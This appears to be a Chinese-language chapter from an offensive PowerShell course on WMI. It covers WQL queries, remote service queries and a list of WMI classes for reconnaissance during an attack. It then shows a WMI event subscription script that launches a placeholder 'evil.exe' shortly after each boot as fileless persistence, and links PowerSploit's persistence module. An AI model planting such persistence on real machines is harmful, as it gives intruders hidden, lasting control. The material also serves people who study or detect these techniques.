<h3 id="&#x5728;powershell&#x4E2D;&#x4F7F;&#x7528;&#x6807;&#x51C6;wql&#x5BF9;wmi&#x64CD;&#x4F5C;">&#x5728;Powershell&#x4E2D;&#x4F7F;&#x7528;&#x6807;&#x51C6;WQL&#x5BF9;WMI&#x64CD;&#x4F5C;</h3>
<p><code>SELECT * FROM Win32_Process WHERE Name LIKE &quot;% WinRM%&quot;</code>
&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x53C2;&#x6570;<code>-query</code>&#x8FDB;&#x884C;&#x67E5;&#x8BE2;:
&#x4E0A;&#x9762;&#x7684;&#x547D;&#x4EE4;&#x662F;&#x67E5;&#x8BE2;&#x8FDB;&#x7A0B;&#x4E2D;&#x540D;&#x5B57;&#x4E3A;WinRM&#x7684;&#x8FDB;&#x7A0B;
<code>Get-WmiObject -Query &quot;select * from win32_service where name=&apos;WinRM&apos;&quot; | Format-List -Property PSComputerName, Name, ExitCode, Name, ProcessID, StartMode, State, Status</code></p>
<h3 id="&#x4F7F;&#x7528;ps&#x63D0;&#x4F9B;&#x7684;wmi&#x63A5;&#x53E3;">&#x4F7F;&#x7528;Ps&#x63D0;&#x4F9B;&#x7684;WMI&#x63A5;&#x53E3;</h3>
<p><code>Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem</code></p>
<p>&#x5176;&#x4E2D;<code>ROOT\CIMV2</code>&#x662F;&#x4E00;&#x4E2A;&#x9ED8;&#x8BA4;&#x7684;&#x547D;&#x540D;&#x7A7A;&#x95F4;, &#x7C7B;<code>Win32_OperatingSystem</code>&#x662F;&#x83B7;&#x53D6;&#x673A;&#x5668;&#x7684;&#x4FE1;&#x606F;, &#x8FD9;&#x91CC;&#x5BF9;&#x5E94;&#x5230;&#x6211;&#x4EEC;&#x7684;wmic.exe&#x7684;&#x547D;&#x4EE4;&#x5C31;&#x662F;<code>wmic /NAMESPACE:&quot;root\CIMV2&quot; PATH Win32_OperatingSystem</code>, &#x90A3;&#x4E48;&#x8FD8;&#x6709;&#x5F88;&#x591A;&#x7C7B;&#x53EF;&#x4EE5;&#x8C03;&#x7528;&#xFF0C;&#x6BD4;&#x5982;&#xFF1A;<code>Get-WmiObject -Class Win32_Process</code>&#xFF0C;&#x8FD9;&#x6761;&#x547D;&#x4EE4;&#x4F1A;&#x83B7;&#x53D6;&#x5230;&#x6240;&#x6709;&#x7684;&#x672C;&#x5730;&#x8BA1;&#x7B97;&#x673A;&#x7684;&#x8FDB;&#x7A0B;&#xFF0C;&#x6211;&#x4EEC;&#x9009;&#x62E9;&#x4E00;&#x4E2A;&#x8FDB;&#x7A0B;&#x6765;&#x67E5;&#x770B;<code>Get-WmiObject -Class Win32_Process | Where-Object {$_.name -like &quot;*explorer*&quot;}</code>
&#x663E;&#x793A;&#x5982;&#x4E0B;:</p>
<pre><code>__GENUS                    : 2
__CLASS                    : Win32_Process
__SUPERCLASS               : CIM_Process
__DYNASTY                  : CIM_ManagedSystemElement
__RELPATH                  : Win32_Process.Handle=&quot;2828&quot;
__PROPERTY_COUNT           : 45
__DERIVATION               : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}
__SERVER                   : WIN-0B8BJI54VH7
__NAMESPACE                : root\cimv2
__PATH                     : \\WIN-0B8BJI54VH7\root\cimv2:Win32_Process.Handle=&quot;2828&quot;
Caption                    : explorer.exe
CommandLine                : C:\Windows\Explorer.EXE
CreationClassName          : Win32_Process
CreationDate               : 20171019151524.230494+480
CSCreationClassName        : Win32_ComputerSystem
CSName                     : WIN-0B8BJI54VH7
Description                : explorer.exe
ExecutablePath             : C:\Windows\Explorer.EXE
ExecutionState             :
Handle                     : 2828
HandleCount                : 993
InstallDate                :
KernelModeTime             : 570183655
MaximumWorkingSetSize      : 1380
MinimumWorkingSetSize      : 200
Name                       : explorer.exe
OSCreationClassName        : Win32_OperatingSystem
OSName                     : Microsoft Windows 7 &#x4E13;&#x4E1A;&#x7248; |C:\Windows|\Device\Harddisk0\Partition1
OtherOperationCount        : 446903
OtherTransferCount         : 13797646
PageFaults                 : 762204
PageFileUsage              : 50548
ParentProcessId            : 1060
PeakPageFileUsage          : 72548
PeakVirtualSize            : 469929984
PeakWorkingSetSize         : 106956
Priority                   : 8
PrivatePageCount           : 51761152
ProcessId                  : 2828
QuotaNonPagedPoolUsage     : 78
QuotaPagedPoolUsage        : 659
QuotaPeakNonPagedPoolUsage : 91
QuotaPeakPagedPoolUsage    : 820
ReadOperationCount         : 22670
ReadTransferCount          : 343804812
SessionId                  : 1
Status                     :
TerminationDate            :
ThreadCount                : 32
UserModeTime               : 323078071
VirtualSize                : 386273280
WindowsVersion             : 6.1.7601
WorkingSetSize             : 71655424
WriteOperationCount        : 1163
WriteTransferCount         : 50207671
ProcessName                : explorer.exe
Handles                    : 993
VM                         : 386273280
WS                         : 71655424
Path                       : C:\Windows\Explorer.EXE
</code></pre><p>&#x90A3;&#x4E48;wmi&#x6709;&#x4EC0;&#x4E48;&#x4F5C;&#x7528;, &#x8FD9;&#x91CC;powershell&#x8C03;&#x7528;&#x5373;&#x53EF;&#xFF0C;&#x6BD4;&#x5982;&#x6211;&#x4EEC;&#x7684;&#x8FDC;&#x7A0B;&#x6389;&#x7528;:</p>
<pre><code class="lang-powershell">C:\PS&gt;<span class="hljs-built_in">get-wmiobject</span> -query <span class="hljs-string">&quot;select * from win32_service where name=&apos;WinRM&apos;&quot;</span> -computername server01, server02

ExitCode  : <span class="hljs-number">0</span>
Name      : WinRM
ProcessId : <span class="hljs-number">1708</span>
StartMode : Auto
State     : Running
Status    : OK

ExitCode  : <span class="hljs-number">0</span>
Name      : WinRM
ProcessId : <span class="hljs-number">948</span>
StartMode : Auto
State     : Running
Status    : OK
</code></pre>
<p>&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5E38;&#x7528;&#x7684;&#x7C7B;&#x5305;&#x62EC;&#x4E0B;&#x9762;&#x7684;&#x51E0;&#x79CD;:</p>
<pre><code>&#x4E0B;&#x9762;&#x7684; WMI &#x7C7B;&#x662F;&#x5728;&#x653B;&#x51FB;&#x7684;&#x4FA6;&#x5BDF;&#x9636;&#x6BB5;&#x53EF;&#x4EE5;&#x6536;&#x96C6;&#x6570;&#x636E;&#x7684;&#x5B50;&#x96C6;:
&#x4E3B;&#x673A;/&#x64CD;&#x4F5C;&#x7CFB;&#x7EDF;&#x4FE1;&#x606F;:Win32_OperatingSystem, Win32_ComputerSystem
&#x6587;&#x4EF6;/&#x76EE;&#x5F55;&#x5217;&#x4E3E;: CIM_DataFile
&#x78C1;&#x76D8;&#x5377;&#x5217;&#x4E3E;: Win32_Volume
&#x6CE8;&#x518C;&#x8868;&#x64CD;&#x4F5C;: StdRegProv
&#x8FD0;&#x884C;&#x8FDB;&#x7A0B;: Win32_Process
&#x670D;&#x52A1;&#x5217;&#x4E3E;: Win32_Service
&#x4E8B;&#x4EF6;&#x65E5;&#x5FD7;: Win32_NtLogEvent
&#x767B;&#x5F55;&#x8D26;&#x6237;: Win32_LoggedOnUser
&#x5171;&#x4EAB;: Win32_Share
&#x5DF2;&#x5B89;&#x88C5;&#x8865;&#x4E01;: Win32_QuickFixEngineering
</code></pre><p>&#x6BD4;&#x5982;&#x8FD9;&#x91CC;&#x83B7;&#x53D6;&#x5230;&#x7684;&#x8865;&#x4E01;&#x4FE1;&#x606F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS C:\Users\rootclay&gt; <span class="hljs-built_in">Get-WmiObject</span> -Class Win32_QuickFixEngineering

Source        Description      HotFixID      InstalledBy          InstalledOn
------        -----------      --------      -----------          -----------
WIN-<span class="hljs-number">0</span>B8BJI... Hotfix           KB2534111                          <span class="hljs-number">2017</span>/<span class="hljs-number">9</span>/<span class="hljs-number">6</span> <span class="hljs-number">0</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>
WIN-<span class="hljs-number">0</span>B8BJI... Update           KB2999226     WIN-<span class="hljs-number">0</span>B8BJI54VH7\r... <span class="hljs-number">2017</span>/<span class="hljs-number">10</span>/<span class="hljs-number">25</span> <span class="hljs-number">0</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>
WIN-<span class="hljs-number">0</span>B8BJI... Update           KB976902      WIN-<span class="hljs-number">0</span>B8BJI54VH7\A... <span class="hljs-number">2010</span>/<span class="hljs-number">11</span>/<span class="hljs-number">21</span> <span class="hljs-number">0</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>
</code></pre>
<h3 id="wmi&#x89E6;&#x53D1;&#x5668;">WMI&#x89E6;&#x53D1;&#x5668;</h3>
<p>WMI&#x7528;&#x5904;&#x53EF;&#x4EE5;&#x8BF4;&#x662F;&#x975E;&#x5E38;&#x7684;&#x591A;&#xFF0C;&#x4F46;&#x662F;&#x6211;&#x4EEC;&#x4E0D;&#x80FD;&#x4E00;&#x4E00;&#x5217;&#x4E3E;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x7528;&#x4E00;&#x4E2A;wmi&#x5728;&#x653B;&#x9632;&#x4E2D;&#x7528;&#x7684;&#x6700;&#x795E;&#x5316;&#x7684;&#x4E00;&#x4E2A;&#x529F;&#x80FD;&#xFF0C;&#x65E0;&#x6587;&#x4EF6;&#x6301;&#x4E45;&#x5316;&#x63A7;&#x5236;&#x7684;&#x4F8B;&#x5B50;&#x6765;&#x4E3E;&#x4E00;&#x4E2A;&#x5B9E;&#x9645;&#x4F8B;&#x5B50;:</p>
<p>&#x90A3;&#x4E48;&#x60F3;&#x8981;&#x4E86;&#x89E3;&#x5230;wmi&#x7684;&#x8FD9;&#x9879;&#x529F;&#x80FD;&#xFF0C;&#x6211;&#x4EEC;&#x5148;&#x6765;&#x770B;&#x770B;wmi&#x4E8B;&#x4EF6;&#x7684;&#x57FA;&#x7840;:</p>
<h4 id="&#x4E8B;&#x4EF6;&#x89E6;&#x53D1;&#x6761;&#x4EF6;">&#x4E8B;&#x4EF6;&#x89E6;&#x53D1;&#x6761;&#x4EF6;</h4>
<ol>
<li><p>&#x4E8B;&#x4EF6;&#x7B5B;&#x9009;&#x5668;</p>
<p> &#x4E8B;&#x4EF6;&#x7B5B;&#x9009;&#x5668;&#x662F;&#x4EC0;&#x4E48;&#x5462;&#xFF1F;&#x4E8B;&#x4EF6;&#x7B5B;&#x9009;&#x5668;&#x63CF;&#x8FF0;&#x4E8B;&#x4EF6;&#x5E76;&#x4E14;&#x6267;&#x884C;WQL&#x4E8B;&#x4EF6;&#x67E5;&#x8BE2;&#x3002;</p>
</li>
<li><p>&#x4E8B;&#x4EF6;&#x6D88;&#x8D39;&#x8005;</p>
<p> &#x4E8B;&#x4EF6;&#x6D88;&#x8D39;&#x8005;&#x662F;&#x4EC0;&#x4E48;&#x5462;&#xFF1F;&#x4E8B;&#x4EF6;&#x6D88;&#x8D39;&#x662F;&#x4E00;&#x4E2A;&#x6D3E;&#x751F;&#x81EA; __EventConsumer &#x7CFB;&#x7EDF;&#x7C7B;&#x7684;&#x7C7B;&#xFF0C;&#x5B83;&#x8868;&#x793A;&#x4E86;&#x5728;&#x4E8B;&#x4EF6;&#x89E6;&#x53D1;&#x65F6;&#x7684;&#x52A8;&#x4F5C;&#x3002;&#x6211;&#x4EEC;&#x5E38;&#x7528;&#x7684;&#x6D88;&#x8D39;&#x7C7B;&#x6709;&#x4E0B;&#x9762;&#x4E24;&#x4E2A;&#xFF1A;</p>
<ol>
<li>ActiveScriptEventConsumer - &#x6267;&#x884C;&#x5D4C;&#x5165;&#x7684; VBScript &#x6216; JScript &#x811A;&#x672C; payload</li>
<li>CommandLineEventConsumer - &#x6267;&#x884C;&#x4E00;&#x4E2A;&#x547D;&#x4EE4;&#x884C;&#x7A0B;&#x5E8F;</li>
</ol>
</li>
<li><p>&#x6D88;&#x8D39;&#x8005;&#x7ED1;&#x5B9A;&#x7B5B;&#x9009;&#x5668;</p>
<p>  &#x6D88;&#x8D39;&#x8005;&#x7ED1;&#x5B9A;&#x7B5B;&#x9009;&#x5668;&#xFF1F;&#x6D88;&#x8D39;&#x8005;&#x7ED1;&#x5B9A;&#x7B5B;&#x9009;&#x5668;&#x5C31;&#x662F;&#x5C06;&#x7B5B;&#x9009;&#x5668;&#x7ED1;&#x5B9A;&#x5230;&#x6D88;&#x8D39;&#x8005;&#x7684;&#x6CE8;&#x518C;&#x673A;&#x5236;&#x3002;</p>
</li>
</ol>
<h4 id="&#x5B9E;&#x4F8B;&#x4EE3;&#x7801;">&#x5B9E;&#x4F8B;&#x4EE3;&#x7801;</h4>
<p>&#x4E0B;&#x9762;&#x6211;&#x4EEC;&#x5206;&#x6790;&#x4E00;&#x4E2A;&#x5B9E;&#x4F8B;&#x4EE3;&#x7801;&#xFF1A;&#x5176;&#x4E2D;&#x7B2C;5&#x4E2A;&#x53D8;&#x91CF;&#x4E3A;&#x4E8B;&#x4EF6;&#x7B5B;&#x9009;&#x5668;&#x3001;&#x7B2C;6&#x4E2A;&#x53D8;&#x91CF;&#x4E3A;&#x4E8B;&#x4EF6;&#x6D88;&#x8D39;&#x8005;&#x3001;&#x6700;&#x540E;&#x4E00;&#x4E2A;&#x5C31;&#x662F;&#x7ED1;&#x5B9A;&#x4E8B;&#x4EF6;&#x7B5B;&#x9009;&#x5668;&#x548C;&#x4E8B;&#x4EF6;&#x6D88;&#x8D39;&#x8005;&#xFF0C;&#x4E5F;&#x5C31;&#x662F;&#x901A;&#x4FD7;&#x7406;&#x89E3;&#x7684;&#x6267;&#x884C;&#x3002;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x80FD;&#x8FBE;&#x5230;&#x4EC0;&#x4E48;&#x6548;&#x679C;&#x5462;&#xFF1F;&#x4E8B;&#x4EF6;&#x7B5B;&#x9009;&#x5668;&#x5728;&#x7CFB;&#x7EDF;&#x542F;&#x52A8;&#x540E;&#x7684; 200 &#x548C; 320 &#x79D2;&#x4E4B;&#x95F4;&#x88AB;&#x5F53;&#x4F5C;&#x4E00;&#x4E2A;&#x89E6;&#x53D1;&#x5668;&#x3002;&#x5728;&#x4E8B;&#x4EF6;&#x88AB;&#x89E6;&#x53D1;&#x65F6;&#x4E8B;&#x4EF6;&#x6D88;&#x8D39;&#x8005;&#x4F1A;&#x4F7F;&#x7528;<code>CommandLineEventConsumer</code>&#x6267;&#x884C;&#x5DF2;&#x6307;&#x5B9A;&#x597D;&#x7684;&#x53EF;&#x6267;&#x884C;&#x6587;&#x4EF6;&#x3002;</p>
<pre><code class="lang-powershell"><span class="hljs-variable">$filterName</span>=<span class="hljs-string">&apos;BotFilter82&apos;</span>

<span class="hljs-variable">$consumerName</span>=<span class="hljs-string">&apos;BotConsumer23&apos;</span>

<span class="hljs-variable">$exePath</span>=<span class="hljs-string">&apos;C:\Windows\System32\evil.exe&apos;</span>

<span class="hljs-variable">$Query</span>=&#x201D;SELECT * FROM __InstanceModificationEvent WITHIN <span class="hljs-number">60</span> WHERE TargetInstance 
ISA <span class="hljs-string">&apos;Win32_PerfFormattedData_PerfOS_System&apos;</span> AND 
TargetInstance.SystemUpTime &gt;= <span class="hljs-number">200</span> AND TargetInstance.SystemUpTime &lt; <span class="hljs-number">320</span>&#x201D;

<span class="hljs-variable">$WMIEventFilter</span>=Set-WmiInstance -Class__EventFilter -NameSpace &#x201D;root\subscription&#x201D; -Arguments @ 
{Name=<span class="hljs-variable">$filterName</span>;EventNameSpace=&#x201D;root\
cimv2&#x201D;;QueryLanguage=&#x201D;WQL&#x201D;;Query=<span class="hljs-variable">$Query</span>}
-ErrorActionStop

<span class="hljs-variable">$WMIEventConsumer</span>=Set-WmiInstance -Class CommandLineEventConsumer -Namespace&#x201D; root\
subscription&#x201D; -Arguments @=<span class="hljs-variable">$consumerName</span>;ExecutablePa
th=<span class="hljs-variable">$exePath</span>;CommandLineTemplate=<span class="hljs-variable">$exePath</span>}

Set-WmiInstance-Class__FilterToConsumerBinding -Namespace &#x201D;root\subscription&#x201D; -Arguments
@{<span class="hljs-keyword">Filter</span>=<span class="hljs-variable">$WMIEventFilter</span>;Consumer=<span class="hljs-variable">$WMIEventConsumer</span>}
</code></pre>
<p>&#x540C;&#x65F6;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;Powersploit&#x7684;<a href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Persistence/Persistence.psm1" target="_blank">&#x4EE3;&#x7801;</a>&#x5373;&#x53EF;&#xFF0C;&#x4EE3;&#x7801;&#x4F1A;&#x5728;&#x672C;&#x76EE;&#x5F55;&#x4E0B;&#x751F;&#x6210;&#x7C7B;&#x4F3C;&#x4E8E;&#x4E0A;&#x9762;&#x7684;Powershell&#x4EE3;&#x7801;&#xFF0C;&#x76F4;&#x63A5;&#x8FD0;&#x884C;&#x5373;&#x53EF;&#x3002;</p>
<h4 id="&#x751F;&#x547D;&#x5468;&#x671F;">&#x751F;&#x547D;&#x5468;&#x671F;</h4>
<p>&#x5BF9;&#x4E8E;&#x6211;&#x4EEC;&#x5B89;&#x88C5;&#x7684;wmi&#x4E8B;&#x4EF6;&#xFF0C;&#x5982;&#x679C;&#x4F60;&#x662F;&#x4F7F;&#x7528;&#x666E;&#x901A;&#x7528;&#x6237;&#x6743;&#x9650;&#x542F;&#x52A8;&#x7684;&#x90A3;&#x4E48;&#x4ED6;&#x7684;&#x751F;&#x547D;&#x5468;&#x671F;&#x5C31;&#x662F;&#x4E3B;&#x8FDB;&#x7A0B;&#x7684;&#x751F;&#x547D;&#x5468;&#x671F;&#xFF0C;&#x5982;&#x679C;&#x4F7F;&#x7528;&#x7684;&#x662F;&#x7BA1;&#x7406;&#x5458;&#x7684;&#x6743;&#x9650;&#x8FD0;&#x884C;&#x7684;&#xFF0C;&#x90A3;&#x4E48;&#x5C31;&#x80FD;&#x591F;&#x8FBE;&#x5230;&#x6301;&#x4E45;&#x5316;&#x63A7;&#x5236;&#x7684;&#x6548;&#x679C;&#x3002;</p>

                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="ntlm-pian/README.md" class="navigation navigation-prev " aria-label="Previous page: 进阶篇">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
                <a href="8. Win32API.html" class="navigation navigation-next " aria-label="Next page: Win32API">
                    <i class="fa fa-angle-right"></i>
                </a>
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"WMI&dot-net对象操作","level":"1.3.1","depth":2,"next":{"title":"Win32API","level":"1.3.2","depth":2,"path":"8. Win32API.md","ref":"8. Win32API.md","articles":[]},"previous":{"title":"进阶篇","level":"1.3","depth":1,"path":"ntlm-pian/README.md","ref":"ntlm-pian/README.md","articles":[{"title":"WMI&dot-net对象操作","level":"1.3.1","depth":2,"path":"7. WMI对象操作.md","ref":"7. WMI对象操作.md","articles":[]},{"title":"Win32API","level":"1.3.2","depth":2,"path":"8. Win32API.md","ref":"8. Win32API.md","articles":[]},{"title":"注入操作","level":"1.3.3","depth":2,"path":"9. Dll注入&shellcode注入&exe注入.md","ref":"9. Dll注入&shellcode注入&exe注入.md","articles":[]},{"title":"混淆","level":"1.3.4","depth":2,"path":"10. 混淆.md","ref":"10. 混淆.md","articles":[]},{"title":"日志操作","level":"1.3.5","depth":2,"path":"11. 日志操作.md","ref":"11. 日志操作.md","articles":[]}]},"dir":"ltr"},"config":{"gitbook":"*","theme":"default","variables":{},"plugins":["livereload"],"pluginsConfig":{"livereload":{},"highlight":{},"search":{},"lunr":{"maxIndexSize":1000000,"ignoreSpecialCharacters":false},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":false}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"}},"file":{"path":"7. WMI对象操作.md","mtime":"2020-04-13T09:48:14.584Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2020-04-13T09:56:21.455Z"},"basePath":".","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="gitbook/gitbook.js"></script>
    <script src="gitbook/theme.js"></script>
    
        
        <script src="gitbook/gitbook-plugin-livereload/plugin.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/lunr.min.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/search-lunr.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-sharing/buttons.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    

    </body>
</html>

